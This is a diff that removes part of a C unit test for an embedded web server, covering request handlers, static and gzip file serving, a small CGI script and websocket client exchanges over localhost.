-		    (unsigned long)data_len,
-		    (int)data_len,
-		    data);
-	} else {
-		WS_TEST_TRACE("Client %i received %lu bytes binary data from\n",
-		              pclient_data->clientId,
-		              (unsigned long)data_len);
-	}
-
-	pclient_data->data = malloc(data_len);
-	ck_assert(pclient_data->data != NULL);
-	memcpy(pclient_data->data, data, data_len);
-	pclient_data->len = data_len;
-
-	mark_point();
-
-	return 1;
-}
-
-
-static void
-websocket_client_close_handler(const struct mg_connection *conn,
-                               void *user_data)
-{
-	struct mg_context *ctx = mg_get_context(conn);
-	struct tclient_data *pclient_data =
-	    (struct tclient_data *)mg_get_user_data(ctx);
-
-#ifndef __MACH__
-	ck_assert_ptr_eq(user_data, (void *)pclient_data);
-
-	ck_assert(pclient_data != NULL);
-
-	WS_TEST_TRACE("Client %i: Close handler\n", pclient_data->clientId);
-	pclient_data->closed++;
-
-	mark_point();
-#else
-
-	(void)user_data;
-	pclient_data->closed++;
-
-#endif /* __MACH__ */
-}
-
-#endif /* USE_WEBSOCKET */
-
-
-START_TEST(test_request_handlers)
-{
-	char ebuf[100];
-	struct mg_context *ctx;
-	struct mg_connection *client_conn;
-	const struct mg_request_info *ri;
-	char uri[64];
-	char buf[1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + 9 + 10 + 8];
-	const char *expected =
-	    "112123123412345123456123456712345678123456789123456789A";
-	int i;
-	const char *request = "GET /U7 HTTP/1.0\r\n\r\n";
-#if defined(USE_IPV6) && defined(NO_SSL)
-	const char *HTTP_PORT = "8084,[::]:8086";
-	short ipv4_port = 8084;
-	short ipv6_port = 8086;
-#elif !defined(USE_IPV6) && defined(NO_SSL)
-	const char *HTTP_PORT = "8084";
-	short ipv4_port = 8084;
-#elif defined(USE_IPV6) && !defined(NO_SSL)
-	const char *HTTP_PORT = "8084,[::]:8086,8194r,[::]:8196r,8094s,[::]:8096s";
-	short ipv4_port = 8084;
-	short ipv4s_port = 8094;
-	short ipv4r_port = 8194;
-	short ipv6_port = 8086;
-	short ipv6s_port = 8096;
-	short ipv6r_port = 8196;
-#elif !defined(USE_IPV6) && !defined(NO_SSL)
-	const char *HTTP_PORT = "8084,8194r,8094s";
-	short ipv4_port = 8084;
-	short ipv4s_port = 8094;
-	short ipv4r_port = 8194;
-#endif
-
-	const char *OPTIONS[16];
-	const char *opt;
-	FILE *f;
-	const char *plain_file_content;
-	const char *encoded_file_content;
-	const char *cgi_script_content;
-	const char *expected_cgi_result;
-	int opt_idx = 0;
-	struct stat st;
-
-#if !defined(NO_SSL)
-	const char *ssl_cert = locate_ssl_cert();
-#endif
-
-#if defined(USE_WEBSOCKET)
-	struct tclient_data ws_client1_data = {NULL, 0, 0, 1};
-	struct tclient_data ws_client2_data = {NULL, 0, 0, 2};
-	struct tclient_data ws_client3_data = {NULL, 0, 0, 3};
-	struct tclient_data ws_client4_data = {NULL, 0, 0, 4};
-	struct mg_connection *ws_client1_conn = NULL;
-	struct mg_connection *ws_client2_conn = NULL;
-	struct mg_connection *ws_client3_conn = NULL;
-	struct mg_connection *ws_client4_conn = NULL;
-#endif
-
-	char cmd_buf[256];
-	char *cgi_env_opt;
-
-	mark_point();
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = HTTP_PORT;
-	OPTIONS[opt_idx++] = "authentication_domain";
-	OPTIONS[opt_idx++] = "test.domain";
-#if !defined(NO_FILES)
-	OPTIONS[opt_idx++] = "document_root";
-	OPTIONS[opt_idx++] = ".";
-#endif
-#ifndef NO_SSL
-	ck_assert(ssl_cert != NULL);
-	OPTIONS[opt_idx++] = "ssl_certificate";
-	OPTIONS[opt_idx++] = ssl_cert;
-#endif
-	OPTIONS[opt_idx++] = "cgi_environment";
-	cgi_env_opt = (char *)calloc(1, 4096 /* CGI_ENVIRONMENT_SIZE */);
-	ck_assert_ptr_ne(cgi_env_opt, NULL);
-	cgi_env_opt[0] = 'x';
-	cgi_env_opt[1] = '=';
-	memset(cgi_env_opt + 2, 'y', 4090); /* Add large env field, so the server
-	                                     * must reallocate buffers. */
-	OPTIONS[opt_idx++] = cgi_env_opt;
-
-	OPTIONS[opt_idx++] = "num_threads";
-	OPTIONS[opt_idx++] = "2";
-
-
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-	ctx = test_mg_start(NULL, &g_ctx, OPTIONS);
-
-	ck_assert(ctx != NULL);
-	g_ctx = ctx;
-
-	opt = mg_get_option(ctx, "listening_ports");
-	ck_assert_str_eq(opt, HTTP_PORT);
-
-	opt = mg_get_option(ctx, "cgi_environment");
-	ck_assert_ptr_ne(opt, cgi_env_opt);
-	ck_assert_int_eq((int)opt[0], (int)cgi_env_opt[0]);
-	ck_assert_int_eq((int)opt[1], (int)cgi_env_opt[1]);
-	ck_assert_int_eq((int)opt[2], (int)cgi_env_opt[2]);
-	ck_assert_int_eq((int)opt[3], (int)cgi_env_opt[3]);
-	/* full length string compare will reach limit in the implementation
-	 * of the check unit test framework */
-	{
-		size_t len_check_1 = strlen(opt);
-		size_t len_check_2 = strlen(cgi_env_opt);
-		ck_assert_uint_eq(len_check_1, len_check_2);
-	}
-
-	/* We don't need the original anymore, the server has a private copy */
-	free(cgi_env_opt);
-
-	opt = mg_get_option(ctx, "throttle");
-	ck_assert_str_eq(opt, "");
-
-	opt = mg_get_option(ctx, "unknown_option_name");
-	ck_assert(opt == NULL);
-
-	for (i = 0; i < 1000; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, request_test_handler, NULL);
-	}
-	for (i = 500; i < 800; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, NULL, (void *)(ptrdiff_t)1);
-	}
-	for (i = 600; i >= 0; i--) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, NULL, (void *)(ptrdiff_t)2);
-	}
-	for (i = 750; i <= 1000; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx, uri, NULL, (void *)(ptrdiff_t)3);
-	}
-	for (i = 5; i < 9; i++) {
-		sprintf(uri, "/U%u", i);
-		mg_set_request_handler(ctx,
-		                       uri,
-		                       request_test_handler,
-		                       (void *)(ptrdiff_t)i);
-	}
-
-#ifdef USE_WEBSOCKET
-	mg_set_websocket_handler(ctx,
-	                         "/websocket",
-	                         websock_server_connect,
-	                         websock_server_ready,
-	                         websock_server_data,
-	                         websock_server_close,
-	                         (void *)(ptrdiff_t)7531);
-#endif
-
-	/* Try to load non existing file */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /file/not/found HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "404");
-	mg_close_connection(client_conn);
-
-	/* Get data from callback */
-	client_conn = mg_download(
-	    "localhost", ipv4_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get data from callback using http://127.0.0.1 */
-	client_conn = mg_download(
-	    "127.0.0.1", ipv4_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	if ((i >= 0) && ((size_t)i < sizeof(buf))) {
-		buf[i] = 0;
-	} else {
-		ck_abort_msg(
-		    "ERROR: test_request_handlers: read returned %i (>=0, <%i)",
-		    (int)i,
-		    (int)sizeof(buf));
-	}
-	ck_assert((int)i < (int)sizeof(buf));
-	ck_assert(i > 0);
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-#if defined(USE_IPV6)
-	/* Get data from callback using http://[::1] */
-	client_conn =
-	    mg_download("[::1]", ipv6_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-#endif
-
-#if !defined(NO_SSL)
-	/* Get data from callback using https://127.0.0.1 */
-	client_conn = mg_download(
-	    "127.0.0.1", ipv4s_port, 1, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get redirect from callback using http://127.0.0.1 */
-	client_conn = mg_download(
-	    "127.0.0.1", ipv4r_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "302");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, -1);
-	mg_close_connection(client_conn);
-#endif
-
-#if defined(USE_IPV6) && !defined(NO_SSL)
-	/* Get data from callback using https://[::1] */
-	client_conn =
-	    mg_download("[::1]", ipv6s_port, 1, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get redirect from callback using http://127.0.0.1 */
-	client_conn =
-	    mg_download("[::1]", ipv6r_port, 0, ebuf, sizeof(ebuf), "%s", request);
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "302");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, -1);
-	mg_close_connection(client_conn);
-#endif
-
-/* It seems to be impossible to find out what the actual working
- * directory of the CI test environment is. Before breaking another
- * dozen of builds by trying blindly with different paths, just
- * create the file here */
-#ifdef _WIN32
-	f = fopen("test.txt", "wb");
-#else
-	f = fopen("test.txt", "w");
-#endif
-	plain_file_content = "simple text file\n";
-	fwrite(plain_file_content, 17, 1, f);
-	fclose(f);
-
-#ifdef _WIN32
-	f = fopen("test_gz.txt.gz", "wb");
-#else
-	f = fopen("test_gz.txt.gz", "w");
-#endif
-	encoded_file_content = "\x1f\x8b\x08\x08\xf8\x9d\xcb\x55\x00\x00"
-	                       "test_gz.txt"
-	                       "\x00\x01\x11\x00\xee\xff"
-	                       "zipped text file"
-	                       "\x0a\x34\x5f\xcc\x49\x11\x00\x00\x00";
-	fwrite(encoded_file_content, 1, 52, f);
-	fclose(f);
-
-#ifdef _WIN32
-	f = fopen("test.cgi", "wb");
-	cgi_script_content = "#!test.cgi.cmd\r\n";
-	fwrite(cgi_script_content, strlen(cgi_script_content), 1, f);
-	fclose(f);
-	f = fopen("test.cgi.cmd", "w");
-	cgi_script_content = "@echo off\r\n"
-	                     "echo Connection: close\r\n"
-	                     "echo Content-Type: text/plain\r\n"
-	                     "echo.\r\n"
-	                     "echo CGI test\r\n"
-	                     "\r\n";
-	fwrite(cgi_script_content, strlen(cgi_script_content), 1, f);
-	fclose(f);
-#else
-	f = fopen("test.cgi", "w");
-	cgi_script_content = "#!/bin/sh\n\n"
-	                     "printf \"Connection: close\\r\\n\"\n"
-	                     "printf \"Content-Type: text/plain\\r\\n\"\n"
-	                     "printf \"\\r\\n\"\n"
-	                     "printf \"CGI test\\r\\n\"\n"
-	                     "\n";
-	(void)fwrite(cgi_script_content, strlen(cgi_script_content), 1, f);
-	(void)fclose(f);
-	(void)system("chmod a+x test.cgi");
-#endif
-	expected_cgi_result = "CGI test";
-
-	/* Get static data */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /test.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, 17);
-	if ((i >= 0) && (i < (int)sizeof(buf))) {
-		buf[i] = 0;
-	}
-	ck_assert_str_eq(buf, plain_file_content);
-#endif
-	mg_close_connection(client_conn);
-
-
-	/* Check if CGI test executable exists */
-	memset(&st, 0, sizeof(st));
-
-#if defined(_WIN32)
-	/* TODO: not yet available */
-	sprintf(ebuf, "%scgi_test.cgi", locate_test_exes());
-#else
-	sprintf(ebuf, "%scgi_test.cgi", locate_test_exes());
-
-	if (stat(ebuf, &st) != 0) {
-		fprintf(stderr, "\nFile %s not found\n", ebuf);
-		fprintf(stderr,
-		        "This file needs to be compiled manually before "
-		        "starting the test\n");
-		fprintf(stderr,
-		        "e.g. by gcc test/cgi_test.c -o output/cgi_test.cgi\n\n");
-
-		/* Abort test with diagnostic message */
-		ck_abort_msg("Mandatory file %s must be built before starting the test",
-		             ebuf);
-	}
-#endif
-
-
-/* Test with CGI test executable */
-#if defined(_WIN32)
-	sprintf(cmd_buf, "copy %s\\cgi_test.cgi cgi_test.exe", locate_test_exes());
-#else
-	sprintf(cmd_buf, "cp %s/cgi_test.cgi cgi_test.cgi", locate_test_exes());
-#endif
-	(void)system(cmd_buf);
-
-#if !defined(NO_CGI) && !defined(NO_FILES) && !defined(_WIN32)
-	/* TODO: add test for windows, check with POST */
-	client_conn = mg_download(
-	    "localhost",
-	    ipv4_port,
-	    0,
-	    ebuf,
-	    sizeof(ebuf),
-	    "%s",
-	    "POST /cgi_test.cgi/x/y.z HTTP/1.0\r\nContent-Length: 3\r\n\r\nABC");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-#endif
-
-	/* Get zipped static data - will not work if Accept-Encoding is not set */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /test_gz.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "404");
-	mg_close_connection(client_conn);
-
-	/* Get zipped static data - with Accept-Encoding */
-	client_conn = mg_download(
-	    "localhost",
-	    ipv4_port,
-	    0,
-	    ebuf,
-	    sizeof(ebuf),
-	    "%s",
-	    "GET /test_gz.txt HTTP/1.0\r\nAccept-Encoding: gzip\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, 52);
-	if ((i >= 0) && (i < (int)sizeof(buf))) {
-		buf[i] = 0;
-	}
-	ck_assert_int_eq(ri->content_length, 52);
-	ck_assert_str_eq(buf, encoded_file_content);
-#endif
-	mg_close_connection(client_conn);
-
-/* Get CGI generated data */
-#if !defined(NO_CGI)
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /test.cgi HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-
-	(void)expected_cgi_result;
-	(void)cgi_script_content;
-#else
-	i = mg_read(client_conn, buf, sizeof(buf));
-	if ((i >= 0) && (i < (int)sizeof(buf))) {
-		while ((i > 0) && ((buf[i - 1] == '\r') || (buf[i - 1] == '\n'))) {
-			i--;
-		}
-		buf[i] = 0;
-	}
-	/* ck_assert_int_eq(i, (int)strlen(expected_cgi_result)); */
-	ck_assert_str_eq(buf, expected_cgi_result);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-#endif
-
-#else
-	(void)expected_cgi_result;
-	(void)cgi_script_content;
-#endif
-
-	/* Get directory listing */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET / HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert(i > 6);
-	buf[6] = 0;
-	ck_assert_str_eq(buf, "<html>");
-#endif
-	mg_close_connection(client_conn);
-
-	/* POST to static file (will not work) */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "POST /test.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "404");
-#else
-	ck_assert_str_eq(ri->local_uri, "405");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert(i >= 29);
-	buf[29] = 0;
-	ck_assert_str_eq(buf, "Error 405: Method Not Allowed");
-#endif
-	mg_close_connection(client_conn);
-
-	/* PUT to static file (will not work) */
-	client_conn = mg_download("localhost",
-	                          ipv4_port,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "PUT /test.txt HTTP/1.0\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-#if defined(NO_FILES)
-	ck_assert_str_eq(ri->local_uri, "405"); /* method not allowed */
-#else
-	ck_assert_str_eq(ri->local_uri, "401"); /* not authorized */
-#endif
-	mg_close_connection(client_conn);
-
-
-	/* Get data from callback using mg_connect_client instead of mg_download */
-	memset(ebuf, 0, sizeof(ebuf));
-	client_conn =
-	    mg_connect_client("127.0.0.1", ipv4_port, 0, ebuf, sizeof(ebuf));
-
-	ck_assert_str_eq(ebuf, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "%s", request);
-
-	i = mg_get_response(client_conn, ebuf, sizeof(ebuf), 10000);
-	ck_assert_int_ge(i, 0);
-	ck_assert_str_eq(ebuf, "");
-
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get data from callback using mg_connect_client and absolute URI */
-	memset(ebuf, 0, sizeof(ebuf));
-	client_conn =
-	    mg_connect_client("localhost", ipv4_port, 0, ebuf, sizeof(ebuf));
-
-	ck_assert_str_eq(ebuf, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn,
-	          "GET http://test.domain:%d/U7 HTTP/1.0\r\n\r\n",
-	          ipv4_port);
-
-	i = mg_get_response(client_conn, ebuf, sizeof(ebuf), 10000);
-	ck_assert_int_ge(i, 0);
-	ck_assert_str_eq(ebuf, "");
-
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-	/* Get data from callback using mg_connect_client and absolute URI with a
-	 * sub-domain */
-	memset(ebuf, 0, sizeof(ebuf));
-	client_conn =
-	    mg_connect_client("localhost", ipv4_port, 0, ebuf, sizeof(ebuf));
-
-	ck_assert_str_eq(ebuf, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn,
-	          "GET http://subdomain.test.domain:%d/U7 HTTP/1.0\r\n\r\n",
-	          ipv4_port);
-
-	i = mg_get_response(client_conn, ebuf, sizeof(ebuf), 10000);
-	ck_assert_int_ge(i, 0);
-	ck_assert_str_eq(ebuf, "");
-
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	i = mg_read(client_conn, buf, sizeof(buf));
-	ck_assert_int_eq(i, (int)strlen(expected));
-	buf[i] = 0;
-	ck_assert_str_eq(buf, expected);
-	mg_close_connection(client_conn);
-
-
-/* Websocket test */
-#ifdef USE_WEBSOCKET
-	/* Then connect a first client */
-	ws_client1_conn =
-	    mg_connect_websocket_client("localhost",
-	                                ipv4_port,
-	                                0,
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client1_data);
-
-	ck_assert(ws_client1_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client1_data.data)); /* Wait for the websocket welcome message */
-	ck_assert_int_eq(ws_client1_data.closed, 0);
-	ck_assert_int_eq(ws_client2_data.closed, 0);
-	ck_assert_int_eq(ws_client3_data.closed, 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert_uint_eq(ws_client2_data.len, 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert_uint_eq(ws_client1_data.len, websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client1_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-	mg_websocket_client_write(ws_client1_conn,
-	                          WEBSOCKET_OPCODE_TEXT,
-	                          "data1",
-	                          5);
-
-	wait_not_null(
-	    &(ws_client1_data
-	          .data)); /* Wait for the websocket acknowledge message */
-	ck_assert_int_eq(ws_client1_data.closed, 0);
-	ck_assert_int_eq(ws_client2_data.closed, 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert_uint_eq(ws_client2_data.len, 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert_uint_eq(ws_client1_data.len, 3);
-	ck_assert(!memcmp(ws_client1_data.data, "ok1", 3));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-/* Now connect a second client */
-#ifdef USE_IPV6
-	ws_client2_conn =
-	    mg_connect_websocket_client("[::1]",
-	                                ipv6_port,
-	                                0,
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client2_data);
-#else
-	ws_client2_conn =
-	    mg_connect_websocket_client("127.0.0.1",
-	                                ipv4_port,
-	                                0,
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client2_data);
-#endif
-	ck_assert(ws_client2_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client2_data.data)); /* Wait for the websocket welcome message */
-	ck_assert(ws_client1_data.closed == 0);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data != NULL);
-	ck_assert(ws_client2_data.len == websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client2_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client2_data.data);
-	ws_client2_data.data = NULL;
-	ws_client2_data.len = 0;
-
-	mg_websocket_client_write(ws_client1_conn,
-	                          WEBSOCKET_OPCODE_TEXT,
-	                          "data2",
-	                          5);
-
-	wait_not_null(
-	    &(ws_client1_data
-	          .data)); /* Wait for the websocket acknowledge message */
-
-	ck_assert(ws_client1_data.closed == 0);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert(ws_client1_data.len == 4);
-	ck_assert(!memcmp(ws_client1_data.data, "ok 2", 4));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-	mg_websocket_client_write(ws_client1_conn, WEBSOCKET_OPCODE_TEXT, "bye", 3);
-
-	wait_not_null(
-	    &(ws_client1_data.data)); /* Wait for the websocket goodbye message */
-
-	ck_assert(ws_client1_data.closed == 0);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-	ck_assert(ws_client1_data.data != NULL);
-	ck_assert(ws_client1_data.len == websocket_goodbye_msg_len);
-	ck_assert(!memcmp(ws_client1_data.data,
-	                  websocket_goodbye_msg,
-	                  websocket_goodbye_msg_len));
-	free(ws_client1_data.data);
-	ws_client1_data.data = NULL;
-	ws_client1_data.len = 0;
-
-	ck_assert(ws_client1_data.closed == 0); /* Not closed */
-
-	mg_close_connection(ws_client1_conn);
-
-	test_sleep(3); /* Won't get any message */
-
-	ck_assert(ws_client1_data.closed == 1); /* Closed */
-
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-
-	mg_websocket_client_write(ws_client2_conn, WEBSOCKET_OPCODE_TEXT, "bye", 3);
-
-	wait_not_null(
-	    &(ws_client2_data.data)); /* Wait for the websocket goodbye message */
-
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data != NULL);
-	ck_assert(ws_client2_data.len == websocket_goodbye_msg_len);
-	ck_assert(!memcmp(ws_client2_data.data,
-	                  websocket_goodbye_msg,
-	                  websocket_goodbye_msg_len));
-	free(ws_client2_data.data);
-	ws_client2_data.data = NULL;
-	ws_client2_data.len = 0;
-
-	mg_close_connection(ws_client2_conn);
-
-	test_sleep(3); /* Won't get any message */
-
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 1);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-
-	/* Connect client 3 */
-	ws_client3_conn =
-	    mg_connect_websocket_client("localhost",
-#if defined(NO_SSL)
-	                                ipv4_port,
-	                                0,
-#else
-	                                ipv4s_port,
-	                                1,
-#endif
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client3_data);
-
-	ck_assert(ws_client3_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client3_data.data)); /* Wait for the websocket welcome message */
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 1);
-	ck_assert(ws_client3_data.closed == 0);
-	ck_assert(ws_client1_data.data == NULL);
-	ck_assert(ws_client1_data.len == 0);
-	ck_assert(ws_client2_data.data == NULL);
-	ck_assert(ws_client2_data.len == 0);
-	ck_assert(ws_client3_data.data != NULL);
-	ck_assert(ws_client3_data.len == websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client3_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client3_data.data);
-	ws_client3_data.data = NULL;
-	ws_client3_data.len = 0;
-
-	/* Write long data (16 bit size header) */
-	mg_websocket_client_write(ws_client3_conn,
-	                          WEBSOCKET_OPCODE_BINARY,
-	                          long_ws_buf,
-	                          long_ws_buf_len_16);
-
-	/* Wait for the response */
-	wait_not_null(&(ws_client3_data.data));
-
-	ck_assert_int_eq((int)ws_client3_data.len, (int)long_ws_buf_len_16);
